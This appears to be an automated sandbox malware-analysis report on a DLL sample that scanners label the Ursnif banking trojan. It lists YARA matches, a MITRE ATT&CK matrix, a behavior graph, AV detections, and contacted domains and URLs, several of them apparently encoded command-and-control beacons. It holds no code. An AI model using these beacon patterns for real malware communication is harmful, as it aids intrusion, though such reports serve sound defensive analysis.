                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API2Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerSecurity Software Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSVirtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery13Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481107 Sample: qT9Qk5aKTk.dll Startdate: 10/09/2021 Architecture: WINDOWS Score: 92 36 ocsp.sca1b.amazontrust.com 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 2 other signatures 2->54 8 loaddll32.exe 1 2->8         started        signatures3 process4 signatures5 58 Writes or reads registry keys via WMI 8->58 60 Writes registry values via WMI 8->60 11 regsvr32.exe 8->11         started        14 cmd.exe 1 8->14         started        16 iexplore.exe 2 80 8->16         started        18 18 other processes 8->18 process6 signatures7 62 Writes or reads registry keys via WMI 11->62 64 Writes registry values via WMI 11->64 20 rundll32.exe 14->20         started        23 iexplore.exe 16->23         started        26 iexplore.exe 16->26         started        28 iexplore.exe 16->28         started        30 iexplore.exe 16->30         started        32 WerFault.exe 18->32         started        34 WerFault.exe 18->34         started        process8 dnsIp9 56 Writes registry values via WMI 20->56 38 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49779, 49780 YAHOO-DEBDE United Kingdom 23->38 40 dart.l.doubleclick.net 172.217.19.102, 443, 49745, 49746 GOOGLEUS United States 23->40 46 14 other IPs or domains 23->46 42 ocsp.sca1b.amazontrust.com 13.225.29.191, 49823, 49824, 49887 AMAZON-02US United States 26->42 44 192.168.2.1 unknown unknown 32->44 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      qT9Qk5aKTk.dll81%VirustotalBrowse
                      qT9Qk5aKTk.dll59%MetadefenderBrowse
                      qT9Qk5aKTk.dll82%ReversingLabsWin32.Trojan.Ursnif
                      qT9Qk5aKTk.dll100%AviraTR/AD.Ursnif.urvkx

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      33.2.rundll32.exe.4c30000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      43.2.rundll32.exe.50a0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.2f90000.3.unpack100%AviraHEUR/AGEN.1108168Download File
                      2.2.regsvr32.exe.23e0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.31b0000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      19.0.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      33.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      19.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      19.0.rundll32.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      44.2.rundll32.exe.4c30000.1.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
                      https://btloader.com/tag?o=6208086025961472&upapi=true1%VirustotalBrowse
                      https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
                      https://ad-delivery.net/px.gif?ch=1&e=0.74427704940679280%Avira URL Cloudsafe
                      http://ocsp.sca1b.amazontrust.com/images/1mUl4vSxMxI/e7HhiI3PfruX2m/qXVt2BLImZpNU2AUWYoPx/KJXoqE51DtcFrNZ_/2BgDE50_2B2je1s/48lZWMnPdCpHd_2FFy/Vcq64rYip/9aN0bRvWizmkP5fXR2T3/jiHfK2wSGdTtZ8VP53I/SUMESuf_2FBQAkd3zXxfOT/_2BcxECgxKRoa/s8ZW5dhr/E0BgSy4u3Bh6HSi/j.avi0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg0%Avira URL Cloudsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      http://ocsp.sca1b.amazontrust.com/images/pHWWVyKJpE2g/nNZcTMutRbw/CCuOk7RvdVCDGz/STh4ftwA407S9VDDkvBy4/G7M_2BJ4E2bGBbf7/N4t3UKgsWntjM7M/mhCOIjxjlHyX4RUX7Q/Rdq3ib1hF/2fWqDSaJ9GA2yVZ_2Bgz/9iFlTX9OFyKHKxrjQJU/JYzhGNAUNkUKgLpHHU6bLf/nZUT_2BcMHeCkKwcWj/aMt.avi0%Avira URL Cloudsafe
                      https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
                      https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                      http://ocsp.sca1b.amazontrust.com/images/cCdYQdt2tX8RhHk/neYfmVtOu_2BWHOxaX/ecV9VJIhq/XE4M5D_2FzTYipgQVzFy/24_2BtaWyVjXI2M_2FX/wa66wgzPqWCXC0kGRqyEUL/snesyfGZeTgvJ/569YwYUH/U86MzznZ70JhRKq9sWcaTd1/Hzb_2FFW0u/GZ5sESPD_2B5JLMQh/7K5kxREyrQ1n/mKmdzEvi70Tv5/6xorN.avi0%Avira URL Cloudsafe
                      http://ocsp.sca1b.amazontrust.com/images/ljDNkkzbV4a6qGMM6/1HExUGmQXVwO/frwWBEjdrZ4/d5S8UlSiYa0DzX/el9J2qXVIUyYCxMHHr91X/kizLttMGapdo5SvF/olXlCBP7aPqDsmB/ICQ2HKBamF1i_2Fxdj/ZsDmjnqFK/ytn9Ymr2xJl5Qy4kiXVc/IQDWlUGPzShrNYAjXzf/JPSl_2BD7pWwAJFNY_2B0f/3A3oDAh_2BF9_/2BxYBJaFI/UpWol9RI.avi0%Avira URL Cloudsafe
                      https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                      https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      contextual.media.net
                      		23.211.6.95
                      		truefalse
                        		high
                        dart.l.doubleclick.net
                        		172.217.19.102
                        		truefalse
                          		high
                          tls13.taboola.map.fastly.net
                          		151.101.1.44
                          		truefalse
                            		high
                            ocsp.sca1b.amazontrust.com
                            		13.225.29.191
                            		truefalse
                              		high
                              hblg.media.net
                              		23.211.6.95
                              		truefalse
                                		high
                                lg3.media.net
                                		23.211.6.95
                                		truefalse
                                  		high
                                  btloader.com
                                  		172.67.70.134
                                  		truefalse
                                    		high
                                    geolocation.onetrust.com
                                    		104.20.184.68
                                    		truefalse
                                      		high
                                      edge.gycpi.b.yahoodns.net
                                      		87.248.118.23
                                      		truefalse
                                        		high
                                        ad-delivery.net
                                        		104.26.2.70
                                        		truefalse
                                          		high
                                          www.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            ad.doubleclick.net
                                            		unknown
                                            		unknownfalse
                                              		high
                                              srtb.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                img.img-taboola.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  s.yimg.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    web.vortex.data.msn.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      cvision.media.net
                                                      		unknown
                                                      		unknownfalse
                                                        		high

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://btloader.com/tag?o=6208086025961472&upapi=truefalse
                                                        • 1%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ad-delivery.net/px.gif?ch=1&e=0.7442770494067928false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://ocsp.sca1b.amazontrust.com/images/1mUl4vSxMxI/e7HhiI3PfruX2m/qXVt2BLImZpNU2AUWYoPx/KJXoqE51DtcFrNZ_/2BgDE50_2B2je1s/48lZWMnPdCpHd_2FFy/Vcq64rYip/9aN0bRvWizmkP5fXR2T3/jiHfK2wSGdTtZ8VP53I/SUMESuf_2FBQAkd3zXxfOT/_2BcxECgxKRoa/s8ZW5dhr/E0BgSy4u3Bh6HSi/j.avitrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpgfalse
                                                          		high
                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpgfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250false
                                                            		high
                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpgfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://ocsp.sca1b.amazontrust.com/images/pHWWVyKJpE2g/nNZcTMutRbw/CCuOk7RvdVCDGz/STh4ftwA407S9VDDkvBy4/G7M_2BJ4E2bGBbf7/N4t3UKgsWntjM7M/mhCOIjxjlHyX4RUX7Q/Rdq3ib1hF/2fWqDSaJ9GA2yVZ_2Bgz/9iFlTX9OFyKHKxrjQJU/JYzhGNAUNkUKgLpHHU6bLf/nZUT_2BcMHeCkKwcWj/aMt.avitrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationfalse
                                                              		high
                                                              http://ocsp.sca1b.amazontrust.com/images/cCdYQdt2tX8RhHk/neYfmVtOu_2BWHOxaX/ecV9VJIhq/XE4M5D_2FzTYipgQVzFy/24_2BtaWyVjXI2M_2FX/wa66wgzPqWCXC0kGRqyEUL/snesyfGZeTgvJ/569YwYUH/U86MzznZ70JhRKq9sWcaTd1/Hzb_2FFW0u/GZ5sESPD_2B5JLMQh/7K5kxREyrQ1n/mKmdzEvi70Tv5/6xorN.avitrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://ocsp.sca1b.amazontrust.com/images/ljDNkkzbV4a6qGMM6/1HExUGmQXVwO/frwWBEjdrZ4/d5S8UlSiYa0DzX/el9J2qXVIUyYCxMHHr91X/kizLttMGapdo5SvF/olXlCBP7aPqDsmB/ICQ2HKBamF1i_2Fxdj/ZsDmjnqFK/ytn9Ymr2xJl5Qy4kiXVc/IQDWlUGPzShrNYAjXzf/JPSl_2BD7pWwAJFNY_2B0f/3A3oDAh_2BF9_/2BxYBJaFI/UpWol9RI.avitrue
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://searchads.msn.net/.cfm?&&kp=1&~DF8EB834D22FF64704.TMP.4.drfalse
                                                                		high
                                                                https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                                                  		high
                                                                  https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                                                    		high
                                                                    https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.6.drfalse
                                                                      		high
                                                                      https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.6.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://www.msn.com/de-ch/news/other/blaualgen-tr%c3%bcben-den-z%c3%bcrichsee-bei-freienbach/ar-AAOfde-ch[1].htm.6.drfalse
                                                                        		high
                                                                        https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.6.drfalse
                                                                          		high
                                                                          https://www.msn.com/de-ch/news/other/kanton-z%c3%bcrich-beerdigt-westtangente-wetzikon/ar-AAOi8HP?ocde-ch[1].htm.6.drfalse
                                                                            		high
                                                                            https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                                                              		high
                                                                              https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.6.drfalse
                                                                                		high
                                                                                http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                                                                  		high
                                                                                  https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.6.drfalse
                                                                                    		high
                                                                                    https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                      		high
                                                                                      https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                                                        		high
                                                                                        https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.6.drfalse
                                                                                          		high
                                                                                          https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mit-dem-neubau-der-zurich-versicherung-ist-ein-weide-ch[1].htm.6.drfalse
                                                                                            		high
                                                                                            https://www.msn.com/de-ch/news/other/v%c3%b6llig-absurd-f%c3%bcnftkl%c3%a4ssler-m%c3%bcssen-trotz-qude-ch[1].htm.6.drfalse
                                                                                              		high
                                                                                              https://www.skype.com/de-ch[1].htm.6.drfalse
                                                                                                		high
                                                                                                https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562de-ch[1].htm.6.drfalse
                                                                                                  		high
                                                                                                  https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                                                    		high
                                                                                                    https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                                                      		high
                                                                                                      https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                        		high
                                                                                                        https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                                                          		high
                                                                                                          https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                            		high
                                                                                                            https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                                                		high
                                                                                                                https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                  		high
                                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                    		high
                                                                                                                    https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.6.drfalse
                                                                                                                      		high
                                                                                                                      https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                                                        		high
                                                                                                                        https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.6.drfalse
                                                                                                                          		high
                                                                                                                          https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                            		high
                                                                                                                            https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.6.drfalse
                                                                                                                              		high
                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                                                		high
                                                                                                                                https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=_pGcdKMGIS.z.lCTqTjkg1MN5VDhw.LVmKPE.vsvy8xqR9ttauction[1].htm.6.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                                                      		high
                                                                                                                                      http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                                                        		high
                                                                                                                                        https://www.msn.com/de-ch/news/other/frau-hielt-schafe-im-badezimmer-ihrer-mietwohnung/ar-AAOhQkc?ocde-ch[1].htm.6.drfalse
                                                                                                                                          		high
                                                                                                                                          https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-chde-ch[1].htm.6.drfalse
                                                                                                                                            		high
                                                                                                                                            https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;referde-ch[1].htm.6.drfalse
                                                                                                                                              		high
                                                                                                                                              https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                		high
                                                                                                                                                https://www.skype.com/de52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-ein-engl%c3%a4nder-seine-schwangere-frau-vor-cde-ch[1].htm.6.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		low
                                                                                                                                                            https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.6.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.msn.com/de-ch/?ocid=iehpo~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.6.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.msn.com/de-ch/sport/other/seit-corona-kommt-es-vermehrt-zu-t%c3%a4tlichkeiten/ar-AAOf1Pvde-ch[1].htm.6.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.msn.com/de-ch/news/other/nach-13-positiven-tests-drei-klassen-m%c3%bcssen-in-quarant%c3%de-ch[1].htm.6.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1auction[1].htm.6.drfalse
                                                                                                                                                                            		high
